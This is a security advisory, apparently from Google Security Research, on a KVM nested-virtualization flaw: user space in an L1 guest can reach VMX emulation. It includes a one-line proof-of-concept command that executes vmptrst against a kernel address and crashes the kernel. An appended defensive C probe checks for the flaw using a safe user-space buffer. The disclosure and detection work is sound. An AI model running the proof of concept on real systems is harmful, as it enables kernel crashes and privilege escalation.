KVM (Nested Virtualization) - L1 Guest Privilege Escalation
Source: Google Security Research  Author: Google  Published: 2018-06-28
When KVM (on Intel) virtualizes another hypervisor as an L1 VM, it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0.
 
For code running on bare metal or in VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit, even when executed at CPL 3. This behavior is documented by Intel (the example is for the VMPTRST instruction):
 
(Intel Manual 30-18 Vol. 3C)
IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0)
 THEN #UD;
ELSIF in VMX non-root operation
 THEN VMexit;
ELSIF CPL > 0
 THEN #GP(0);
ELSE
 64-bit in-memory destination operand ← current-VMCS pointer;
 
This means that a normal user space program running in the L1 VM can trigger KVM's VMX emulation, which gives a large number of privilege escalation vectors (a fake VMCS, or vmptrld / vmptrst to a kernel address, are the first that come to mind). As the VMX emulation code checks the guest's CR4.VMXE value, this only works if an L2 guest is running.
 
A somewhat realistic exploit scenario would involve someone breaking out of an L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system.
 
Simple PoC (tested with L0 and L1 both running Ubuntu 18.04, kernel 4.15.0-22-generic).
This requires that an L2 guest exists:
 
echo 'int main(void){asm volatile ("vmptrst 0xffffffffc0031337");}' | gcc -xc - ; ./a.out
 
[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337
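A user-space probe, added here as an example and not part of the advisory, that lets an administrator check whether the CPL enforcement from the Intel pseudocode above is actually applied to an L1 guest: it executes VMPTRST from ring 3 with a destination on its own stack (never a kernel address, so it cannot produce the oops shown above) and classifies the outcome by the signal Linux delivers. The function and enum names are my own; it assumes Linux on x86-64 and, to reach the emulation path at all, the same precondition as the PoC (an L1 kernel that has entered VMX operation with an L2 guest running).

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>

/* Outcome of executing VMPTRST at CPL 3 with a user-space destination operand. */
enum vmx_probe {
    PROBE_UD,          /* #UD (SIGILL): not in VMX operation, e.g. this kernel never ran VMXON */
    PROBE_GP,          /* #GP(0) (SIGSEGV): the CPL > 0 check was enforced, as Intel specifies */
    PROBE_COMPLETED,   /* no fault: ring 3 reached the VMX emulation, i.e. the bug described above */
    PROBE_UNSUPPORTED  /* not an x86-64 build; nothing was executed */
};
static sigjmp_buf probe_env;
static volatile sig_atomic_t probe_signal;   /* 0 = no fault, else the signal that fired */

static void probe_handler(int sig)
{
    probe_signal = sig;
    siglongjmp(probe_env, 1);   /* sigsetjmp(.., 1) restores the signal mask on the way back */
}
/* Runs VMPTRST from user space into a local 8-byte buffer; never touches a kernel address. */
enum vmx_probe probe_vmptrst_from_user(void)
{
#if defined(__x86_64__)
    struct sigaction sa, old_ill, old_segv;
    unsigned long long dest = 0;   /* receives the current-VMCS pointer only if the instruction completes */
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = probe_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGILL, &sa, &old_ill);
    sigaction(SIGSEGV, &sa, &old_segv);
    probe_signal = 0;
    if (sigsetjmp(probe_env, 1) == 0)
        __asm__ volatile ("vmptrst %0" : "=m" (dest) : : "memory");
    sigaction(SIGILL, &old_ill, NULL);
    sigaction(SIGSEGV, &old_segv, NULL);
    return probe_signal == 0 ? PROBE_COMPLETED : probe_signal == SIGILL ? PROBE_UD : PROBE_GP;
#else
    return PROBE_UNSUPPORTED;
#endif
}

int main(void)
{
    static const char *const names[] = { "#UD", "#GP(0)", "completed at CPL 3", "unsupported arch" };
    enum vmx_probe r = probe_vmptrst_from_user();
    printf("vmptrst at CPL 3: %s\n", names[r]);
    return r == PROBE_COMPLETED;   /* non-zero exit: the CPL check was not enforced */
}
```

On a fixed L0, or on any host outside nested virtualization, the probe reports #UD or #GP(0); "completed at CPL 3" from inside an L1 guest with an L2 running means the emulating hypervisor still lacks the CPL check.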
 